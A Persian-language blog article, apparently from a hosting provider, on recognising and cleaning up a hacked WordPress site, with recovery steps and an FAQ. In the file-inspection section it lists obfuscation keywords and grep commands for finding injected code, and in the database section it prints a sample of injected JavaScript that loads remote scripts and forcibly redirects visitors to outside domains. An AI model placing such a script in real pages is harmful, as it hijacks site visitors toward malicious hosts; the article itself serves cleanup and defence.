رفع هک سایت وردپرسی با ۱۰ روش رایگان علمی

هک شدن سایت وردپرسی؛ کابوسی که ممکن است به‌سراغ شما هم آمده یا در حال نزدیک شدن باشد؛ چراکه وردپرس یک CMS محبوب است که به‌راحتی مورد تهاجم قرار می‌گیرد. البته با نصب افزونه‌ها و رعایت شرایط امنیتی، این کابوس رنگ خواهد باخت. قبل از اینکه به ادامه مقاله بپردازیم باید بدانید که با خرید هاست وردپرس مناسب از بروز بسیاری از مشکلات امنیتی می‌توانید جلوگیری گنید.

ما در این مقاله شما را به سپر محافظتی مجهز می‌کنیم تا جان وردپرسِ هک شده خود را بازیابید. بنابراین در ابتدا با نشانه های هک شدن سایت وردپرسی آشنا می‌شویم و در ادامه، هفت روش موثر را در رفع این مشکل معرفی خواهیم کرد.

۷ نشانه هک شدن سایت وردپرسی 

به‌طور متداول، وردپرس هک شده هفت علامت رایج را از خود نشان می‌دهد که در ادامه با آن‌ها آشنا خواهید شد. 

۱. عدم امکان ورود به داشبورد وردپرس 

در این حالت، هکر کنترل اکانت‌های وردپرس شما را به‌دست می‌گیرد و تمام اکانت‌های قبلی را حذف کرده یا تغییر می‌دهد. بنابراین نمی‌توانید برای لغو دسترسی‌های غیرمجاز به داشبورد، اقدامی انجام دهید.

۲. تغییرات عجیب در سایت

هرکدام از نشانه‎‌های زیر به‌معنای هک شدن سایت وردپرسی هستند:

۳. Deface شدن

این مورد از شایع‌ترین نشانه های هک شدن سایت وردپرسی است که همه ما با آن آشنا هستیم. Deface شدن به‌معنای مشاهده پیغامی از سوی هکر روی صفحه اصلی سایت است؛ پیام‌هایی مانند Hacked By Ninjas. همچنین در صورت تغییر ناگهانی و ناخواسته قالب یا در دسترس نبودن اطلاعات سایت، احتمال حمله Deface را می‌دهیم.

۴. دریافت پیام اخطار از سرویس‌دهنده هاست

اگر پیام اخطار مبنی‌بر هک شدن هاست یا تعلیق آن از جانب فراهم‌کننده هاستینگ دریافت کردید، یعنی با کابوس وردپرس هک شده چشم‌درچشم هستید.

همچنین افت ناگهانی ترافیک سایت نشان می‌دهد که سایت در Blacklist گوگل یا موتورهای جست‌وجوی دیگر به‌دلیل فعالیت بدافزارها یا اسپم و غیره لیست شده است. این موضوع توسط خدمات‌دهنده هاستینگ به شما تذکر داده می‌شود.

۵. مشاهده تغییرات در فایل‌ها

یکی از راحت‌ترین راه‌ها برای شناسایی سایت هک شده، بررسی تغییرات ایجاد شده در فایل‌های آن است.

برخی از علائم این تغییرات عبارتند از:

۶. شکایت مشتریان

در صورت هک شدن سایت وردپرسی فروشگاهی، به‌طور معمول مشتریان از تقاضا یا دریافت هزینه‌های مازاد و غیرمنطقی از جانب فروشگاه شما شکایت می‌کنند. در این حالت، هکر سایت یا درگاه پرداخت شما را هک کرده است.

اغلب سایت‌های فروشگاهی برپایه ووکامرس ساخته می‌شوند. این افزونه نام مشتریان، آدرس‌ها و ایمیل‌های آن‌ها را در دیتابیس ذخیره می‌کند. همین داده‌ها برای هک کردن وردپرس کافیست.

۷. دریافت پیغام از افزونه‌های امنیتی

برخی افزونه‌ها در وردپرس، مانند Hide My WP و Login Security در صورت مشاهده فعالیت‌های مرتبط‌با هک، به‌سرعت اخطارهایی را در پنل مدیریت نمایش می‌دهند. این اخطارها در مواجه با آسیب‌پذیری افزونه‌ها و ریسک هک شدن سایت وردپرسی، به ایمیل شما ارسال می‌شوند. اگر میخواهید بدانید افزونه وردپرس چیست و چه کارهایی میتوان با آن انجام داد، به این مقاله مراجعه کنید.

۱۰ روش رفع هک سایت وردپرسی

در صورت مشاهده هرکدام از نشانه های هک شدن سایت وردپرسی، می‌توانید از این ۱۰ راه‌کار ساده برای بازیابی سایت‌تان کمک بگیرید.

۱. استفاده از بک‌آپ

به‌طور معمول، ارائه‌دهنده خدمات هاستینگ بک‌آپ‌های خودکار از سایت شما می‌گیرد. در مواجه با وردپرس هک شده، می‌توانید سربزن‌گاه از آن‌ها استفاده کنید و سایت‌تان را بازگردانید.

پس بکاپ‌گیری روزانه، هفتگی یا دوره‌ای را جدی بگیرید و آن‌ها را در حافظه‌ای خارج از سرور میزبان ذخیره کنید.

بکاپ گرفته‌شده باید فایل‌های اصلی وردپرس، پایگاه داده وردپرس، فایل‌های افزونه‌ها، تم‌ها و فایل .htaccess را داشته باشد.

اگر با روش بک‌آپ‌گیری از این CMS آشنایی ندارید، مقاله حیاتی ۳ روش برای بکاپ‌گیری از وردپرس را بخوانید.

۲. فعال کردن حالت نگهداری یا Maintenance Mode 

Maintenance Mode در WordPress قابلیتی برای آفلاین کردن سایت به‌طور موقت و نمایش صفحه دل‌خواه خودتان است. این حالت در مواجه با هک شدن سایت وردپرسی، انجام به‌روزرسانی‌ها، تغییرات یا فعالیت‌های تعمیر و نگهداری عمده روی سایت، کارآمدی زیادی دارد.

همچنین می‌توانید از افزونه‌هایی مانند “Coming Soon” استفاده کنید. این افزونه‌ها با نشان دادن پیامی به کاربران، از آشکار شدن هک سایت و ایجاد جو بد روانی جلوگیری می‌کنند.

۳. تغییر تمام پسوردهای فعلی

درصورتی‌که دسترسی‌تان به سایت قطع نشده است، باید تمام پسوردها را در سریع‌ترین زمان تغییر دهید؛ پسوردهای پنل ادمین، پایگاه داده و دیگر حساب‌های کاربری در این لیست قرار دارند. اگر اعضای دیگری از تیم‌تان به پنل ادمین دسترسی دارند، از آن‌ها درخواست تغییر پسوردها را کنید.

راه‌کار دیگر این است که هر کاربر از سایت خارج (Log Out) و مجدد وارد شود تا احراز هویت جدید صورت بگیرد. هدف از این کار حذف دسترسی کاربران غیرمجاز است.

۴. بررسی افزونه‌های آسیب‌پذیر 

برخی افزونه‌های شخص ثالث (Third-party) به‌راحتی سایت را در معرض هک شدن قرار می‌دهند. برای رفع هک سایت وردپرسی ناشی از افزونه‌های آسیب‌پذیر، به انجمن وردپرس رجوع و لیست افزونه‌های قابل اعتماد را بررسی کنید. آخرین نسخه هر افزونه را دانلود و به‌روزرسانی کنید تا از وقوع حملات جلوگیری کرده و یک قدم به رفع هک سایت وردپرسی خود نزدیک شوید.

مطلب مرتبط: وردپرس چیست ؟ هر آنچه که در شروع کار باید بدانید!

۵. بررسی دقیق فایل‌ها

برای شناسایی فایل‌های دست‌کاری‌شده، کدهای مخرب و بدافزارها، اقدامات زیر را انجام دهید:

find . -name “*.php” -exec grep “base64″‘{}’; -print &> hiddencode.txt
eval, exec, strrev, assert, base64, str_rot13, Stripslashes, preg_replace

برای جست‌وجو این کلمات کلیدی در یک شاخه باید از دستور زیر استفاده کنید. در این مثال کلمه base64 را در مسیر  / جست‌وجو کردیم

sudo grep -lir base64 /

۶. پاک‌سازی فایل‌ها از بدافزارها  

فایل‌های وردپرس، نقشه سایت و پایگاه داده، سه مکانی هستند که باید با دقت و حساسیت بالا، پاک‌سازی یا اگر لازم شد، مجدد نصب شوند. در ادامه این روش را برای رفع هک سایت وردپرسی در سه قدم توضیح خواهیم داد.

  1. پاک‌سازی فایل‌های WordPress

بعد از بررسی گسترده روی سایت و هاست خود، موارد کشف‌شده را لیست کنید؛ فایل‌هایی که تغییر کرده‌اند، آخرین تغییرات روی آن‌ها و کاربران غیرمجاز.

فایل‌های اصلی WordPress از قبیل theme files، wp-uploads، The database، wp-contents/uploads، wp-config.php و plugin files باید پاک‌سازی شوند.

  1. پاک‌سازی فایل Sitemap

یکی دیگر از دلایل هک شدن سایت وردپرسی، وجود بدافزاری در فایل “Sitemap.xml” است. این فایل به گوگل کمک می‌کند تا صفحات مهم وب‌سایت شناسایی شوند. گاهی هکرها به این فایل یک لینک بدافزار را تزریق می‌کنند. بنابراین باید این فایل را بررسی و در صورت وجود لینک مخرب یا هرچیز غیرمعمول دیگر، حذف را انجام داد.

  1. پاک‌سازی پایگاه داده

در پایگاه داده وردپرس، تمام اطلاعات مربوط‌به کاربران، صفحات سایت، گواهی‌نامه‌های حساس و غیره نگهداری می‌شود. بنابراین بررسی این فایل به منظور پیدا کردن علت هک، امری به‌شدت مهم و حیاتی است. بنابراین می‌توانید از یک اسکنر بدافزار برای بررسی کدهای تزریق‌شده به فایل wp_db استفاده کنید.

درصورتی‌که تمایل به بررسی دستی داشتید، باید هر ۱۱ جدول موجود در پایگاه داده را بررسی کنید. تمام لینک‌ها و iframeها را ارزیابی و هر مورد مشکوکی را حذف کنید تا سایت را از حمله نجات دهید.

در کادر زیر یک مثال از کد redirection موجود در فایل پایگاه داده نمایش داده شده است:

<script>

const overlayTranslations = {“en”:{“title”:”Attention!”,”description”:”Click “Allow” to subscribe to notifications and continue working with this website.”}};

const overlay = {“delay”:۳۰۰۰,”overlayStyle”:{“background”:”rgba(0,0,0, 0.6)”},”title”:”Attention!”,”description”:”Click “Allow” to subscribe to notifications and continue working with this website.”,…(overlayTranslations[navigator.language.slice(0, 2).toLowerCase()]||Object.values(overlayTranslations)[0])};

 const s = document.createElement(‘script’);

s.src=’//humsoolt.net/pfe/current/tag.min.js?z=2774009′;

s.onload = (sdk) => {

sdk.updateOptions({overlay, overlayTranslations})

sdk.onPermissionDefault(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294”)});

sdk.onPermissionAllowed(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294”)});

sdk.onPermissionDenied(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294”)});

sdk.onAlreadySubscribed(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});

sdk.onNotificationUnsupported(() => {});

}

document.head.appendChild(s);

</script>

<script data-cfasync=’false’ type=’text/javascript’ src=’//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2′></script><script type=”text/javascript” src=”//dolohen.com/apu.php?zoneid=2574011″ async data-cfasync=”false”></script><script type=”text/javascript” src=”//dolohen.com/apu.php?zoneid=676630″ async data-cfasync=”false”></script>

۷. نصب مجدد فایل‌ها

اگر خرابی‌های صورت‌گرفته با شدت زیادی رخ داده‌اند، نصب مجدد فایل‌ها از وب‌سایت رسمی، بهترین روش رفع هک سایت وردپرسی است. در این حالت باید تمام فایل‌ها را از هاست حذف کرده و تم‌ها، پلاگین‌ها و غیره را مجدد نصب کنید.

بیشتر بخوانید: 20 روش عملی رفع مشکل استفاده CPU در سایت‌ها و انواع هاست

۸. امن کردن لاگین و فرم‌ها

یک شیوه متداول برای حمله به وردپرس، حملات “Brute Force” است. در این حمله، هکر تلاش می‌کند با استفاده از نرم‌افزار و ترکیب‌های مختلفی از نام‌های کاربری و رمزهای عبور، به پنل مدیریت دسترسی پیدا کند. 

بهترین روش برای نجات وردپرس هک شده با حملات Brute Force، بالا بردن امنیت فرم لاگین به اشکال زیر است:

۹. تغییر هاست یا شرکت ارائه‌دهنده

هاست محلی بسیار مهم برای سایت است که هرگز نباید نسبت‌به کارآمدی، پشتیبانی و بک‌آپ‌گیری منظم آن غفلت کنید. بنابراین در جهت حفظ امنیت سایت‌ و فایل‌های حیاتی آن، باید فاکتورهای زیر را برای انتخاب بهترین شرکت ارائه‌دهنده خدمات هاستینگ در نظر بگیرید:

یکی از مهم‌ترین اقداماتی که می‌تواند از هک سایت وردپرسی شما جلوگیری کند یا در صورت بروز مشکل به شما کمک کند، داشتن یک نسخه پشتیبان (Backup) از سایت است. با داشتن بکاپ منظم، می‌توانید به‌راحتی سایت خود را به حالت قبل بازگردانید. اگر با فرآیند بکاپ‌گیری آشنا نیستید، آموزش بکاپ گیری در دایرکت ادمین را مطالعه کنید تا این کار را به‌صورت اصولی انجام دهید.

۱۰. غیرفعال کردن افزونه‌ها و تم‌ها به‌صورت موقت

ابتدا همه افزونه‌ها و تم‌ها را غیرفعال و دوباره فعال کنید. این کار راه‌های نفوذ به پنل مدیریت و تشخیص وردپرس هک شده را ساده می‌کند. پس از شناسایی پلاگین‌ها و تم‌های مخرب و آسیب‌پذیر، آن‌ها را به‌طور دائم حذف کنید تا دیگر سایت‌تان مورد حمله قرار نگیرد.

چگونه از هک شدن سایت وردپرسی جلوگیری کنیم؟

پیش از بروز نشانه های هک شدن سایت وردپرسی و مورد حمله قرار گرفتن آن، با دنبال کردن روش‌های امنیتی ساده‌ می‌توانید از بروز این اتفاق جلوگیری کنید. در ادامه هرکدام از این اقدام‌ها را نام خواهیم برد.

آنچه در رفع هک سایت وردپرسی خواندیم

هر وب‌سایتی در معرض آسیب و حمله است؛ اما سایت‌های وردپرسی به‌دلیل محبوبیت و البته کم‌آگاهی برخی افراد، آسیب‌پذیری بیشتری را با خود به‌دوش می‌کشد. نشانه‌های وردپرس هک شده شامل عدم اجازه برای ورود به پنل مدیریت، مشاهده تغییرات ناگهانی در صفحه اصلی یا تغییرات ناخواسته در فایل‌ها گواهی بر این موضوع هستند. اگر چنین علائمی را دیدید، بلافاصله سایت را در حالت Maintenance قرار دهید تا از آسیب بیشتر و بی‌اعتمادی کاربران جلوگیری کنید. راه‌هایی مانند استفاده از بک‌آپ، تغییر پسوردهای فعلی و نصب مجدد فایل‌ها، راه‌کارهای رایگان و فوری هستند.

آیا سایت شما تابه‌حال مورد حمله هکرها قرار گرفته است؟ می‌خواهید این تجربه تلخ را با چه کلماتی با ما در میان بگذارید؟ خوش‌حال می‌شویم که این تجربه و راه‌کارهای منحصربه‌فردتان را در بخش نظرات میزبانی کنیم.

سوالات متداولی که شما می‌پرسید:

  1. اکانت لاگین وردپرس من هک شده است. چه کاری باید انجام دهم؟

باید بلافاصله آن را در حالت تعمیر و نگهداری (Maintenance) قرار دهید تا از آسیب بیشتر جلوگیری کنید. سپس رمز ورودتان را Reset کنید تا دسترسی به داشبورد مدیریت ممکن شده کاربران ناشناس را از سایت خود حذف کنید. قدم بعدی حذف افزونه‌های غیرضروری است. در مرحله آخر هم باید هسته وردپرس سایت‌تان را به‌روز کنید.

  1. چگونه ویروس را از وردپرس حذف کنیم؟

فعال‌سازی حال Maintenance، استفاده از بک‌آپ، پاک کردن تمام کدهای وردپرس و نصب مجدد آن از منبع اصلی، حذف کدهای ناشناس و مشکول از wpconfig و درخواست از گوگل برای ایندکس مجدد سایت، ازجمله اقدامات موثر در این حملات هستند.

  1. آیا پلاگین‌ها و تم‌ها باعث هک وردپرس می‌شوند؟

اگر آن‌ها را از منابع اصلی خارجی یا ایرانی بخرید، خیر؛ اما اگر از پلاگین‌ها و تم‌های رایگان و غیرمعتبر استفاده کنید، احتمال هک وردپرس بسیار بالا می‌رود.

منابع:

Jetpack

wpbeginner

2 پاسخ

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *